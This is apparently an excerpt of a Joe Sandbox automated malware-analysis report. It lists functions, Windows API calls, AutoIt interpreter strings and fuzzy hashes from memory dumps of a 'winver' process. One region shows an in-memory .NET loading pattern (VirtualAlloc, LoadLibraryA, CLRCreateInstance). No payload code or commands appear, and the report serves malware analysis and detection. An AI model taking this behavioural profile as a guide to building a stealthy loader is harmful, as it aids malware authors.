Part of subcall function 00007FF63D7D7678: _invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7D7736
Part of subcall function 00007FF63D7D7678: _invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7D7787
Part of subcall function 00007FF63D7D7678: _get_daylight.LIBCMT ref: 00007FF63D7D77E3

CreateFileW.KERNEL32 ref: 00007FF63D7D7A49
CreateFileW.KERNEL32 ref: 00007FF63D7D7AA5
GetLastError.KERNEL32 ref: 00007FF63D7D7AD9
GetFileType.KERNEL32 ref: 00007FF63D7D7AEE
GetLastError.KERNEL32 ref: 00007FF63D7D7AF8
CloseHandle.KERNEL32 ref: 00007FF63D7D7B2B
CloseHandle.KERNEL32 ref: 00007FF63D7D7C84
CreateFileW.KERNEL32 ref: 00007FF63D7D7CBC
GetLastError.KERNEL32 ref: 00007FF63D7D7CCB

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
String ID:
API String ID: 1330151763-0
Opcode ID: 75356619fceb7e8782b9ff6c1535ec9632443d8ad89e0ccfb4e7740ef2f6071c
Instruction ID: 737777fdbffa4f1f0e7e5aef04506a92a4a9dfd2c0ebf0d164ebb149bd84cfdb
Opcode Fuzzy Hash: 75356619fceb7e8782b9ff6c1535ec9632443d8ad89e0ccfb4e7740ef2f6071c
Instruction Fuzzy Hash: BBC1BC33B18A498AEB54CFA4D4813AC3771EB49BA8F005235DE2E9B795EF38E415D300

Function 00007FF63D7D11BC Relevance: 10.8, APIs: 7, Instructions: 294
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7D1601

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 863cd979911e4943121c7539b4f655c2a06f07087149b2540904c72d72f465e6
Instruction ID: ce3665f29eebaed618a5ccfd9292dce20e05e9d8bb918f36e8dd2ffab9ad383c
Opcode Fuzzy Hash: 863cd979911e4943121c7539b4f655c2a06f07087149b2540904c72d72f465e6
Instruction Fuzzy Hash: 46C1D262E0C68A85EA618F95944127E6BB5FF80BC0F154135EE8E877D9EE3DF448E300

Function 00007FF63D793DD8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 00007FF63D793E28
CreateWindowExW.USER32 ref: 00007FF63D793E7B
ShowWindow.USER32 ref: 00007FF63D793E91

Strings

AutoIt v3, xrefs: 00007FF63D793DE4
d, xrefs: 00007FF63D793E10
edit, xrefs: 00007FF63D793E34

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Window$Create$Show
String ID: AutoIt v3$d$edit
API String ID: 2813641753-2600919596
Opcode ID: a17061246002f0a2824132c72eb6d9c4990e739eb9176b8bd25570c60f6ef5a7
Instruction ID: 53b1f841d71848309ee598f1c85aa6a940e090b680087b1da9c32d2b3be47c9e
Opcode Fuzzy Hash: a17061246002f0a2824132c72eb6d9c4990e739eb9176b8bd25570c60f6ef5a7
Instruction Fuzzy Hash: 84215B72A28B4586E710CF90F84976A73B4F788B99F104238E64D86764EFBDE048CB00

Function 00007FF63D79B054 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF63D7B323C: MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B326E
Part of subcall function 00007FF63D7B323C: MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B327C
Part of subcall function 00007FF63D7B323C: MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B328C
Part of subcall function 00007FF63D7B323C: MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B329C
Part of subcall function 00007FF63D7B323C: MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B32AA
Part of subcall function 00007FF63D7B323C: MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B32B8

Part of subcall function 00007FF63D7951C4: RegisterWindowMessageW.USER32 ref: 00007FF63D795272

GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63D79106D), ref: 00007FF63D79B39D
OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63D79106D), ref: 00007FF63D79B423
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63D79106D), ref: 00007FF63D7E8708

Strings

AutoIt, xrefs: 00007FF63D79B0DA

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: AutoIt
API String ID: 1986988660-2515660138
Opcode ID: 4f82cc6de09ac82bf12cb03655be0bab12e9feb691a261e29d28599410f709da
Instruction ID: 42bc63a2a634e407f244778c648861916f433ee0f4ff6b7ea08ac43028f89aa7
Opcode Fuzzy Hash: 4f82cc6de09ac82bf12cb03655be0bab12e9feb691a261e29d28599410f709da
Instruction Fuzzy Hash: B7C1C071D18B4A95E700DBA5EC810B877A8FFA4790B54023AD49EC2765FF7CB159E380

Function 00007FF63D7AD854 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetOpenFileNameW.COMDLG32 ref: 00007FF63D7F21CA

Part of subcall function 00007FF63D7AE5B4: GetFullPathNameW.KERNEL32(?,00007FF63D7AE5A1,?,00007FF63D79BB08,?,?,?,00007FF63D79109E), ref: 00007FF63D7AE5DF

Part of subcall function 00007FF63D7AE680: GetLongPathNameW.KERNEL32 ref: 00007FF63D7AE6A4

Strings

AutoIt script files (*.au3, *.a3x), xrefs: 00007FF63D7F219C
au3, xrefs: 00007FF63D7F21A8
Run Script:, xrefs: 00007FF63D7F2175

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
API String ID: 779396738-2360590182
Opcode ID: 2c02a20fedcf6b526d4eba4296e81d7224001575823d41b12d4e2b4d34e38e43
Instruction ID: 0db1053ee470660e5222a486e03b875b4dec44ff33afd1d350ea3d24dae1cc36
Opcode Fuzzy Hash: 2c02a20fedcf6b526d4eba4296e81d7224001575823d41b12d4e2b4d34e38e43
Instruction Fuzzy Hash: 1E318C22A08B8689E720DF61E8401AD77B8FB49B84F584135DE8C87B95EF3CE145D740

Function 00010000 Relevance: 6.5, APIs: 4, Instructions: 502
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 000101AB
LoadLibraryA.KERNEL32 ref: 000101F5
CLRCreateInstance.MSCOREE ref: 0001034D
SafeArrayCreate.OLEAUT32 ref: 000104D2

Memory Dump Source

Source File: 0000000B.00000002.2939143865.0000000000010000.00000020.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000_winver.jbxd

Similarity

API ID: Create$AllocArrayInstanceLibraryLoadSafeVirtual
String ID:
API String ID: 399867853-0
Opcode ID: a1906f09bec2f7e48f265651b9eb421df84c3392494741f1c969f0384442d08f
Instruction ID: 7780cb2f8f76553b2dc52ba9ae88ae64d66cfe34a00d089d038af27f1adcf01f
Opcode Fuzzy Hash: a1906f09bec2f7e48f265651b9eb421df84c3392494741f1c969f0384442d08f
Instruction Fuzzy Hash: 67F10F35659D099FEB84EB58EC54F9133E1FB68320F488169D40ED72A1DE7DE885CB80

Function 00007FF63D7B4C00 Relevance: 4.6, APIs: 3, Instructions: 67timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7947D4: wcscpy.LIBCMT ref: 00007FF63D7948BE
Part of subcall function 00007FF63D7947D4: Shell_NotifyIconW.SHELL32 ref: 00007FF63D7948CC

KillTimer.USER32 ref: 00007FF63D7B4C98
SetTimer.USER32 ref: 00007FF63D7B4CAD
Shell_NotifyIconW.SHELL32 ref: 00007FF63D7FB887

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: IconNotifyShell_Timer$Killwcscpy
String ID:
API String ID: 3812282468-0
Opcode ID: 04d81f5a9dc22b0e5f22bf048e6b02ef49131dc7da6e1dbe66278d932a982a7b
Instruction ID: e2ef2bb20c32e1f8ca332b955132d94be19eb1d84f8d789260fc9ab3bf8b45c1
Opcode Fuzzy Hash: 04d81f5a9dc22b0e5f22bf048e6b02ef49131dc7da6e1dbe66278d932a982a7b
Instruction Fuzzy Hash: EF31B132A0CB9986EB328B6194442BD37A9EB49FC8F184436DA4D47749EE3CE644D750

Function 00007FF63D7ADF08 Relevance: 4.6, APIs: 3, Instructions: 64COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000000,00007FF63D7ADE2D), ref: 00007FF63D7ADF8F
SetFilePointerEx.KERNEL32(?,?,00000000,00007FF63D7ADE2D), ref: 00007FF63D7ADFA7

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: aab185ad873ea16a550847f20283d7044a03c66206e8d1652abb8008e6eddd47
Instruction ID: f4ffcc251b96d3708a87140523311d72d223ede125e6c8aa9cd0f4f19bb50147
Opcode Fuzzy Hash: aab185ad873ea16a550847f20283d7044a03c66206e8d1652abb8008e6eddd47
Instruction Fuzzy Hash: E721E072B19B8482EB508F96E2442AE63B0FB84BC0F104435EB5E83B14EF3CE1A19740

Function 00007FF63D7B3B68 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,00007FF63D7B3B5A,?,?,?,?,?,?,00007FF63D79BCC8), ref: 00007FF63D7B3BAD
RegQueryValueExW.KERNEL32(?,?,?,?,?,?,?,00007FF63D7B3B5A,?,?,?,?,?,?,00007FF63D79BCC8), ref: 00007FF63D7B3BDB
RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00007FF63D7B3B5A,?,?,?,?,?,?,00007FF63D79BCC8), ref: 00007FF63D7B3C02

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 54f50cf7835f2c9e04586b30846721b611dfb4bc33fa8503b3306d495f16848f
Instruction ID: 1b930e247fcb8871387a51c45972d7018bae9e34cfce3f2ffb6b91c9f39daf92
Opcode Fuzzy Hash: 54f50cf7835f2c9e04586b30846721b611dfb4bc33fa8503b3306d495f16848f
Instruction Fuzzy Hash: ED218B32A18B4587D7508FA5E44096E73B4FB48B80B441136DB8D83B94EF39F8949B04

Function 00007FF63D7A59F0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON

Download Yara Rule

APIs

_Init_thread_footer.LIBCMT ref: 00007FF63D7A5F35

Strings

CALL, xrefs: 00007FF63D7A5EFE

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: dfda118cd3983185c6b0ea73f7f87e3ffca9c7c1db58ff6287e2608f0cd365a7
Instruction ID: 059a3ceb29225ceffe76cb28f0e134967397b179c604768969c5f2c1ef89d9f5
Opcode Fuzzy Hash: dfda118cd3983185c6b0ea73f7f87e3ffca9c7c1db58ff6287e2608f0cd365a7
Instruction Fuzzy Hash: 4C225972B08A4A8AEB24DFA5D4802BC37B1FB44B88F504536DA0D97799EF39F455E340

Function 00007FF63D7C4FDC Relevance: 3.2, APIs: 2, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7C5018
_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7C514E

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2f3882e1f14053918a4f78aeac0f4b7f6e6168338a66c19dfad6cf67d74ecfa8
Instruction ID: ce55bab8296c652c0eac36bd396ee71093f991dcfbc219d9f8e0db482f308eb1
Opcode Fuzzy Hash: 2f3882e1f14053918a4f78aeac0f4b7f6e6168338a66c19dfad6cf67d74ecfa8
Instruction Fuzzy Hash: 6A610661F0968A4AFA249AF5980437A66E0AF84BE4F044230DE2DC77D9FF3DF441A601

Function 00007FF63D7ADD28 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF63D7ADD92

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fb2d650cf6f78611fdbec37881645bc323fec31dd7e36498fb01b706574c2f90
Instruction ID: 03d3f0a5b9eee6670bd3dfc2df2a92de779437b1b29d887bd3361e60e595a13a
Opcode Fuzzy Hash: fb2d650cf6f78611fdbec37881645bc323fec31dd7e36498fb01b706574c2f90
Instruction Fuzzy Hash: 4D418232A0964A86EB749F50E41437937B4EB45768F044235DAAD87BC9FF3DF504AB40

Function 00007FF63D7AD9D8 Relevance: 3.1, APIs: 2, Instructions: 91libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7AE418: LoadLibraryA.KERNEL32(?,?,?,00007FF63D7ADA08), ref: 00007FF63D7AE42F
Part of subcall function 00007FF63D7AE418: GetProcAddress.KERNEL32(?,?,?,00007FF63D7ADA08), ref: 00007FF63D7AE447

FreeLibrary.KERNEL32 ref: 00007FF63D7ADA32
LoadLibraryExW.KERNEL32 ref: 00007FF63D7ADA5C

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: c1dd451962493d7ae08ebcde8d736c6739dc86e2e8a3e1e031d582aac59500f0
Instruction ID: 332584f2ceb840d5d1784785daf60f1fd66e7c1c483336d04bb650123605f04a
Opcode Fuzzy Hash: c1dd451962493d7ae08ebcde8d736c6739dc86e2e8a3e1e031d582aac59500f0
Instruction Fuzzy Hash: 0E414E22B1865A8AEB20DFA5D8513FC23B1BB44B8CF454131EA4D87799EF7CE944D740

Function 00007FF63D7AE210 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF63D7ADDB1), ref: 00007FF63D7AE299
SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF63D7ADE67), ref: 00007FF63D7AE2D1

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 6cf57e95577b77d4cb911b73eb7ccb47e3e205c7c2f678e2f9037373f51fd41a
Instruction ID: 93be7775fdb6b4d83522c8949447189cd56f8610f7a6430588f3bcf25e8ecb01
Opcode Fuzzy Hash: 6cf57e95577b77d4cb911b73eb7ccb47e3e205c7c2f678e2f9037373f51fd41a
Instruction Fuzzy Hash: C2215932A09A45C6EB10CF65E04036AB7B1FB88F88F144525DA8887B98DF3CE551DB50

Function 00007FF63D7D1968 Relevance: 3.0, APIs: 2, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00007FF63D7D1908
GetLastError.KERNEL32 ref: 00007FF63D7D1912

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cc2aff0c46daae39380e3a9a18d1cecd873225c58ebfd8d411782c095ea215c8
Instruction ID: 4533c8163963a74de649be227dec37e26ae47ccdd59ebd5dbc0934ac3d27584c
Opcode Fuzzy Hash: cc2aff0c46daae39380e3a9a18d1cecd873225c58ebfd8d411782c095ea215c8
Instruction Fuzzy Hash: 9201A521B1C79641EE648FA9B8450B96670AF80BF0F644331ED3E877D5EE3CE455A300

Function 00007FF63D792B20 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00007FF63D792B46

Part of subcall function 00007FF63D7B9934: _invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7B9948

Part of subcall function 00007FF63D792AD8: SystemParametersInfoW.USER32 ref: 00007FF63D792AF5
Part of subcall function 00007FF63D792AD8: SystemParametersInfoW.USER32 ref: 00007FF63D792B15

Part of subcall function 00007FF63D793B18: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF63D792B75), ref: 00007FF63D793B5A
Part of subcall function 00007FF63D793B18: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF63D792B75), ref: 00007FF63D793B6F
Part of subcall function 00007FF63D793B18: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF63D792B75), ref: 00007FF63D793BE9
Part of subcall function 00007FF63D793B18: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF63D792B75), ref: 00007FF63D793C80

SystemParametersInfoW.USER32 ref: 00007FF63D792B87

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
String ID:
API String ID: 4207566314-0
Opcode ID: b7ff10b2849be03979dc6a49a3b4a3c71707f0f6a8c3cbea45bcd0b1440396c5
Instruction ID: 03aa54a43c3b49b9de7da6a8f508ce0ee821102d0853377393618ec42c9a8adf
Opcode Fuzzy Hash: b7ff10b2849be03979dc6a49a3b4a3c71707f0f6a8c3cbea45bcd0b1440396c5
Instruction Fuzzy Hash: 790114A1E0CA4F9AF790ABE1A8015B933B1AF08B40F440035D40DC67A2FE3CB488A700

Function 00007FF63D7CB9C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF63D7CB9D6
GetLastError.KERNEL32 ref: 00007FF63D7CB9E8

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
